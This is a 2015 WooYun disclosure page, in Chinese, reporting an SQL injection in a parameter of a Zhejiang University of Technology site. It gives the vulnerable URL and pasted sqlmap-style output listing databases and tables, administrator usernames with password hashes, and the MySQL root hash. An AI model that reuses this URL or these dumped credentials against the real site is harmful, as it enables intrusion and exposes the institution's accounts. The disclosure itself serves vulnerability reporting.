当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161980

漏洞标题:浙江工业大学某站存在sql注入漏洞 root权限

相关厂商:zjut.edu.cn

漏洞作者: G00d

提交时间:2015-12-17 10:54

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-17: 细节已通知厂商并且等待厂商处理中
2015-12-17: 厂商已经确认,细节仅向厂商公开
2015-12-27: 细节向核心白帽子及相关领域专家公开
2016-01-06: 细节向普通白帽子公开
2016-01-16: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

浙江工业大学某站存在sql注入漏洞,权限为root权限。

详细说明:

漏洞地址:http://www.mse.zjut.edu.cn/ShowNewsPageAction.do?newsID=3338&smallClassID=55&bigClassID=2
bigClassID参数存在注入。

BHVYU8E6I4DMLFQX8EJXT%T.png


存在的数据库

2.png


available databases [5]:
[*] cgxy_yw
[*] information_schema
[*] mysql
[*] test
[*] xsgz
当前数据库的表内容
Database: cgxy_yw
[17 tables]
+------------------+
| wx_admin |
| wx_bigclass |
| wx_bigclasspro |
| wx_birthday |
| wx_config |
| wx_counter |
| wx_floatnotice |
| wx_friendlink |
| wx_log |
| wx_message |
| wx_news |
| wx_product |
| wx_singlepage |
| wx_smallclass |
| wx_smallclasspro |
| wx_special |
| wx_weekplan |
+------------------+
root权限

3.png


后台管理员账号密码
Database: cgxy_yw
Table: wx_admin
[6 entries]
+----------------------------------+-----------+
| adminPwd | adminName |
+----------------------------------+-----------+
| 2581C10D4ACCC1207841BD1F80518BFC | admin |
| CF7D4BDD2AFBB023F0B265B3E99BA1F9 | mseftw1 |
| CF7D4BDD2AFBB023F0B265B3E99BA1F9 | mseftw2 |
| F59BD65F7EDAFB087A81D4DCA06C4910 | putong2 |
| F59BD65F7EDAFB087A81D4DCA06C4910 | wl |
| F59BD65F7EDAFB087A81D4DCA06C4910 | lucheng |
+----------------------------------+-----------+
数据库用户名密码
database management system users password hashes:
[*] root [1]:
password hash: *16FFFF48FBF176673641EC252421CD7B30751B71

漏洞证明:

漏洞地址:http://www.mse.zjut.edu.cn/ShowNewsPageAction.do?newsID=3338&smallClassID=55&bigClassID=2
bigClassID参数存在注入。

BHVYU8E6I4DMLFQX8EJXT%T.png


存在的数据库

2.png


available databases [5]:
[*] cgxy_yw
[*] information_schema
[*] mysql
[*] test
[*] xsgz
当前数据库的表内容
Database: cgxy_yw
[17 tables]
+------------------+
| wx_admin |
| wx_bigclass |
| wx_bigclasspro |
| wx_birthday |
| wx_config |
| wx_counter |
| wx_floatnotice |
| wx_friendlink |
| wx_log |
| wx_message |
| wx_news |
| wx_product |
| wx_singlepage |
| wx_smallclass |
| wx_smallclasspro |
| wx_special |
| wx_weekplan |
+------------------+
root权限

3.png


后台管理员账号密码
Database: cgxy_yw
Table: wx_admin
[6 entries]
+----------------------------------+-----------+
| adminPwd | adminName |
+----------------------------------+-----------+
| 2581C10D4ACCC1207841BD1F80518BFC | admin |
| CF7D4BDD2AFBB023F0B265B3E99BA1F9 | mseftw1 |
| CF7D4BDD2AFBB023F0B265B3E99BA1F9 | mseftw2 |
| F59BD65F7EDAFB087A81D4DCA06C4910 | putong2 |
| F59BD65F7EDAFB087A81D4DCA06C4910 | wl |
| F59BD65F7EDAFB087A81D4DCA06C4910 | lucheng |
+----------------------------------+-----------+
数据库用户名密码
database management system users password hashes:
[*] root [1]:
password hash: *16FFFF48FBF176673641EC252421CD7B30751B71

修复方案:

过滤吧。。。

版权声明:转载请注明来源 G00d@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-17 10:58

厂商回复:

谢谢您的帮助,我们会尽快处理的

最新状态:

暂无